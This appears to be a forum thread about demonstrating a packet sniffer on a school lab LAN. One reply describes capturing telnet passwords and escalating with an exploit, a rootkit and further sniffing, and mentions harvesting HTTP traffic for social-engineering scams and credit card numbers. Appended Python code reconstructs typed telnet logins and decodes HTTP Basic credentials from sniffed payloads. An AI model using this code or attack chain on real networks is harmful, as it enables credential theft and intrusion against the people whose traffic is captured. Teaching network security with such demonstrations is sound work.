Originally posted by: TJN23
1) Can this be done?
2) Are there VNC / packet sniffing packages available for RedHat (preferably preinstalled on a typical RedHat 8 setup)?
1) Sure.
2) Maybe; tcpdump with some scripts to separate the VNC packets from the rest.
For a packet sniffer I prefer ethereal. It supports many different protocols, so you can screen out the chaff using it. Then it makes it easy to dissect the individual packets and examine what part means what and so on.
If you want to demonstrate what a packet sniffer can do, the two easiest examples are a telnet session and some HTTP internet browsing.
Set up the sniffer on the LAN, then have someone log into one of the machines using telnet and demonstrate that each letter pressed, including passwords, gets sent to the host and then echoed back (passwords don't get echoed back). Then you have the computer they logged into, where they logged in from, what their username is and what their password is. More than likely they use the same username and password for both machines, and voilà! you have access to both networks, more than likely with a convenient username. A simple exploit later, a root kit, and another sniffer later, and you have the tools to capture administrative passwords as they telnet around the local networks.
(just for reference, not pertaining to the school lab lan)
Of course it's a lot easier on an ethernet LAN. If they use (correctly configured) switches it makes it a bit more difficult; if you are on the internet then you have to have access to (control over) one of the hundred networks and routers the info passes through to sniff passwords.
It's all about the collision domain. Older ethernet stuff based off of hubs had network-wide collision domains, so you could get any packet on any part of the network. With good switch deployments the packets get routed only to each specific machine. Nowadays a hacker would have to run a passive tap (physical attachment in an ethernet line) off a backbone line or a line to a server (or control the server) to be likely to get good passwords and info. A lot more risky because it would require physical access, but a passive tap successfully put into a ceiling or something, or a wireless LAN, would be hard to detect with anything but dumb luck.
(/done)
You could also demonstrate easily how a person could monitor web traffic and glean passwords, information, and such off of regular HTTP traffic. Could be useful for intelligence to run social engineering scams. (Think: nobody would know about that webpage on our local intranet, so it would be OK to lend my password to him; poor guy, all that work and he lost his password...) Or get credit card numbers, social security numbers, names, usernames, passwords, e-mail addresses for spammers, blah blah blah.
Just remember though that the easiest way to sniff packets is off of an ethernet network where the computers are connected by hubs. If it's switches (used commonly to maximize bandwidth in full duplex mode) it would make it a bit more difficult, depending on how nice they are and how they are configured.
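Added example (not part of the original post, and not the poster's own script): the two demonstrations described above, the telnet login and the HTTP password grab, reduced to a small Python reconstructor that works on the TCP payloads a sniffer hands you. It strips telnet option negotiation (the IAC sequences from RFC 854), follows the server prompts to pull out the username and password the client typed one keystroke per segment, shows that the server echoes the username but not the password, and decodes an HTTP Basic `Authorization` header. The session and the request are constructed samples embedded in the code; the `s2c`/`c2s` direction labels, the `login:`/`Password:` prompt wording and the credentials are assumptions of the example.

```python
import base64
import re

# Telnet command bytes (RFC 854). Option negotiation is interleaved with the
# user's keystrokes and has to be removed before the stream reads as text.
IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE


def strip_telnet_iac(data: bytes) -> bytes:
    """Drop IAC negotiation (IAC WILL/WONT/DO/DONT opt, IAC SB ... IAC SE) and
    unescape IAC IAC, leaving only the bytes the user typed or saw."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):          # dangling IAC at segment end
            break
        cmd = data[i + 1]
        if cmd == IAC:                  # escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                      # IAC <cmd> <option>
        elif cmd == SB:                 # subnegotiation up to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:
            i += 2                      # other two-byte commands (NOP, GA, ...)
    return bytes(out)


def extract_telnet_login(packets):
    """packets: ordered (direction, payload) pairs, direction 'c2s' or 's2c'.
    Remembers the last server prompt ('login' or 'password') and collects the
    client's keystrokes up to CR as the answer to it."""
    fields, prompt, buf = {}, None, bytearray()
    for direction, payload in packets:
        data = strip_telnet_iac(payload)
        if direction == "s2c":
            m = re.search(r"(login|password):\s*$",
                          data.decode("ascii", "replace"), re.I)
            if m:
                prompt, buf = m.group(1).lower(), bytearray()
            continue
        for b in data:                  # client side: one keystroke per segment
            if b == 0x0D:               # CR ends the answer (LF/NUL may follow)
                if prompt and buf:
                    fields[prompt] = buf.decode("ascii", "replace")
                prompt, buf = None, bytearray()
            elif b not in (0x0A, 0x00):
                buf.append(b)
    return fields


def server_echoed(packets, text: str) -> bool:
    """True if `text` appears in what the server sent back (i.e. was echoed)."""
    server = b"".join(strip_telnet_iac(p) for d, p in packets if d == "s2c")
    return text.encode("ascii") in server


def extract_http_basic(request: bytes):
    """Return (user, password) from an HTTP Basic Authorization header, or None."""
    m = re.search(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$",
                  request, re.M | re.I)
    if not m:
        return None
    user, _, password = base64.b64decode(m.group(1)).decode("latin-1").partition(":")
    return user, password


# Constructed sample telnet session (assumption: typical login dialogue).
# The server echoes each username character; it does not echo the password.
SAMPLE_TELNET = [
    ("s2c", bytes([IAC, DO, 0x18, IAC, WILL, 0x01])),   # DO TERMINAL-TYPE, WILL ECHO
    ("c2s", bytes([IAC, WONT, 0x18, IAC, DO, 0x01])),
    ("s2c", b"\r\nlogin: "),
] + [p for ch in b"student" for p in (("c2s", bytes([ch])), ("s2c", bytes([ch])))] + [
    ("c2s", b"\r\n"), ("s2c", b"\r\n"),
    ("s2c", b"Password: "),
] + [("c2s", bytes([ch])) for ch in b"s3cret"] + [
    ("c2s", b"\r\n"),
    ("s2c", b"\r\n$ "),
]

# Constructed sample HTTP request carrying Basic credentials (assumption).
SAMPLE_HTTP = (b"GET /intranet/ HTTP/1.1\r\nHost: intranet.example\r\n"
               b"Authorization: Basic " + base64.b64encode(b"jdoe:hunter2") +
               b"\r\n\r\n")

if __name__ == "__main__":
    print(extract_telnet_login(SAMPLE_TELNET))            # {'login': 'student', 'password': 's3cret'}
    print(server_echoed(SAMPLE_TELNET, "student"), server_echoed(SAMPLE_TELNET, "s3cret"))
    print(extract_http_basic(SAMPLE_HTTP))                # ('jdoe', 'hunter2')
```

On a real capture the payloads would come from something like `tcpdump -s 0 -w telnet.pcap 'port 23'` (or `'port 23 or portrange 5900-5910'` to keep the VNC display ports as well), with the two directions separated by which side owns port 23; ethereal's "Follow TCP Stream" does the same reassembly interactively. The IAC stripping matters in practice because a session that looks like gibberish at the start is usually just the option negotiation, not encryption.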